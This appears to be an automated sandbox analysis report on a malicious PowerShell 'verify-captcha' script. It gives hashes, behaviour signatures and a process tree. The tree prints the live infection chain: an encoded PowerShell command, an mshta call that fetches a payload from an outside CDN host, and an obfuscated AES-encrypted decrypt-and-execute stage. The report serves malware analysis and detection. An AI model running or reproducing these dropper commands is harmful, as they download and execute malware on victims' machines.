Analysis

  • max time kernel
    837s
  • max time network
    838s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    08-08-2024 23:15

General

  • Target

    verify-captcha-987.b-cdn.net.ps1

  • Size

    147B

  • MD5

    461d549b45e71d09f616ea14cf0f46d2

  • SHA1

    eb06f635e30520fd8e764a3c6fc1216c798400c7

  • SHA256

    b1fd8a4efda12d4ce3f7fa8adaf705dbab2b3b73434334c1fcb2306ff1d390b1

  • SHA512

    ea3dc372f83d76964b01a0437febaef0b725267af8a2e72d55995e301ed5fea02d1792900e4ef7dee5068f2e41d96f7cdb12ed6932fff8637562e64fddb93b4f

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://microsoftcamp-c3.b-cdn.net/camp-v1

Signatures

  • Blocklisted process makes network request 7 IoCs
  • Downloads MZ/PE file
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\verify-captcha-987.b-cdn.net.ps1
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1452
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAG0AaQBjAHIAbwBzAG8AZgB0AGMAYQBtAHAALQBjADMALgBiAC0AYwBkAG4ALgBuAGUAdAAvAGMAYQBtAHAALQB2ADEA
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1860
      • C:\Windows\system32\mshta.exe
        "C:\Windows\system32\mshta.exe" https://microsoftcamp-c3.b-cdn.net/camp-v1
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Modifies system certificate store
        • Suspicious use of WriteProcessMemory
        PID:2784
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function brIUT($HjeA){return -split ($HjeA -replace '..', '0x$& ')};$TODVhRF = brIUT('BD7A2B3707B4D5A6FA04450C5974911467897FAEA635C375E61EF7F5A701362EA05A72FBED7009D99927795122F56BDB77A5C7A562CB97DD7AA6A98126D0C3DD95349835F30F3C05230430C0DA1B06762BEA3D71E28798C9BA2F77E5185B5E033FCC7326AB5E75C350E8498719A25C2CD446C6788AB4A4D29AFC35309C1D12432468945A0065100F65C114310342BF95E644A862E8C59F289D8E869948EC904A8A06AB7BCD877EF40AD48BDA41E53D670E257430C9B41D7D5BA46024B00A0E92061D4E363EC73196FAAF167EC447B53C7EC644814BEF2957F8B8DA25FED21CAAA6BCE526E15F110C22E7D24CB63CF7194D64CBF124EA15CF976417DF9A3C31F6E7F6D1D8CCC6195C1C5759C078BCEC21F1EEAD77FF7C790752A3E6F61259FD936928CC85AB8CE3C4D7F5C5C3911F2E174CA9D668BA6667CFD8552C35A49A82D37FF1802F887BE3102AFEA366E6427CAF4C00AD1D26A2A0E13891C6965C59E68BE6AD1B771007EAE5360AF9978D08345674D9362629818EE2868D79F1D161F6E045DF8E1CE495BBD8C92A3BFFFC94F280BDD27630FC034C765787C3A7394C3B4CCB8AA08B7227276E679751D805C2CFADA79F65BED7EC896FF2096B12C3192449E626BBB14B7B6792F20F020D565334CE2F9A6BB082B7156641CD6202A14786B74D551C2ADAB799E749ECD1C1E737F3C9294E5557C3665B9D47BD63DA7D157BB135E986F659A1C427850F519DCAEF577D3BCE746FA620514A5C286F439BC258BB78B2F8BD90DE2162477D01D9DC24B52215A310AB78548E959A32F0663F77CEA87BB37D0A37A31FA71DDC830BBCEF9F3316C2FFC77F6E777209B1544DD076BE18B3045673702B7B7BD251F50E7EF7B179F1D350B041D7EF374F7329D88AFCDDC3F8CD501E379C678374F52B0FDABD750FA1D09C8905FDBD67017705D890E022478F9BB030476FD95D339DE7A0F15A7DDB42F68124942D5D4486FB8BC9DDE1DE666655505E64CCA93B0C941BEC3F3BCF18754AFB267438DC5CAD4C860ECF9F25234C4B8EED6CDF6549ADCED479DC662D864BB1FE809411022D8EB6B815B883FCB91B12EAAB6FC0B6BD6560C108F4FAD4C9928D9E3B19933A86696D1467487342C9AD3D82A540A0A9DA57B998DDC6DC68EC48628034FB3EB8D2A751BD4E71564D6C5196C311F0CF29EE815190C8C98B4426C7A071721942B5077A4C5BD229C3CB7D0A1F2CE1058BF3458093B4BB3AFCEA0B4DE58511DF411FD69707FB201577A2AEC2ABC554826FD1607A5CDC60713EB9B8101FE77F08291D1A9E3966C88A29A48232CEAB5C9B6AB0EABDFC5640CBB7A15105760EA820B11DDCFB6339C87F98E0D67C8B5F66CEBCDFCDB423D2892AA2201FFFEB45A1138874A513CC6A403E80FA91647FB97DF47B73641F4180417ACB434F8905429663F3AD3CC02BB7EC8F5760A3554C5F07796EEF98D66420E4C4111AF81E26E485973D470629ED4550211C5010EA8F21888817807FBA7077101CFF1200544B8473DB4AD925D5EB83929A96D1FC5937667AB4653F867B3A228F0C730BD97983DB3BAE2349660824615BE382DDB9A6786F42826AA43A43A83EB0E42FAD3B8A6FFE05483348445AD2820E3F9EE9A7DBA888F71410BE3C06EA5EE43D1284AC88D780D1FF5AE61A5ED878A5E73545AD24752B75B054F042668AD1735BD85BE52B0AC4494CD91A14C9AC1C0ACA5DE18CBF88AAECF42D84B0A885B795DE843E77CEF65247AA617140BFC23357F1523F6A79C265A9267D13DB313CB62F90BDAAFB55F8000AED649AAE6925D1F52C5A508578E52F3D210B5EBB7489A8FCD3E6F7E60F31A97F26668424A91E50656E81F8E6DAB37AFD49EFDA7C23171D7D6DF8401B625DD00CF235FB2115DAADA9603D786DF0DDFEB60750B48C2A7E48843819382D3FACCF2C6454FEB4CBC277F2283E469A440005ADCEB43B2FC3EF86468B5DD84F05AF72A8C0581087BE2C289AAB872304A237C3754A7CECBA7EF83A712B19DB18FD57291D0692B28AFFE94FEBE59AF465F107704C6BC3331E3D612B88BCAE82A8256A6A2127FC0477CE03278BFAEAA890B624ACFA7AACAD8131B03EBEC553025E635B44DC38CA1547F6B2F66680DD5464BC1270DE1221BA59EDD09696C57FB590');$yBWZm = [System.Security.Cryptography.Aes]::Create();$yBWZm.Key = brIUT('5A504E5669636D4C584770456265426C');$yBWZm.IV = New-Object byte[] 16;$AiLfvEfU = $yBWZm.CreateDecryptor();$VKZGbTYef = $AiLfvEfU.TransformFinalBlock($TODVhRF, 0, $TODVhRF.Length);$uuGcwomEu = [System.Text.Encoding]::Utf8.GetString($VKZGbTYef);$AiLfvEfU.Dispose();& $uuGcwomEu.Substring(0,3) $uuGcwomEu.Substring(3)
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1584

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YUF3ZB4A\camp-v1[1]

    Filesize

    207KB

    MD5

    f0a82fcce76a638f3800a72f96ebdb00

    SHA1

    6cb602d3f4323766316d2e0811858b3392f015c4

    SHA256

    4de7b791a8a70bb57b6396c57553963320bf0e4e48be55a450e4bc0a59a79e0e

    SHA512

    32fd024cd7a1a0298ca2899dcc1c911981ea7487661a85eda6bcd96cfab3cbdffd61d189191eb82f2f8d53bf90aaa4359571dbe839a26addb2c9956639638878

  • C:\Users\Admin\AppData\Local\Temp\CabEA22.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\TarEAF0.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    447daff0baa77b9405517ce6621ad94e

    SHA1

    35efcd1efcef70b440631a0acc2d718ff1f7cc2c

    SHA256

    0566d7dea0fe66c6004c659ef8f5f8aca351c2974a9eb9b2d8a1851807142fe1

    SHA512

    f8a221abf50b510e11dca22660e0b721cb3f549b6ef837afde4464261c285940884faa4fcf44dadc009c64aa7ab85a166e7a17cfd385e1a64cb0586d51462cd4

  • memory/1452-7-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

    Filesize

    9.6MB

  • memory/1452-9-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

    Filesize

    9.6MB

  • memory/1452-15-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

    Filesize

    9.6MB

  • memory/1452-4-0x000007FEF61EE000-0x000007FEF61EF000-memory.dmp

    Filesize

    4KB

  • memory/1452-6-0x0000000001EC0000-0x0000000001EC8000-memory.dmp

    Filesize

    32KB

  • memory/1452-5-0x000000001B680000-0x000000001B962000-memory.dmp

    Filesize

    2.9MB

  • memory/1584-82-0x000000001B600000-0x000000001B8E2000-memory.dmp

    Filesize

    2.9MB

  • memory/1584-83-0x0000000002790000-0x0000000002798000-memory.dmp

    Filesize

    32KB

  • memory/1860-14-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

    Filesize

    9.6MB

  • memory/1860-86-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

    Filesize

    9.6MB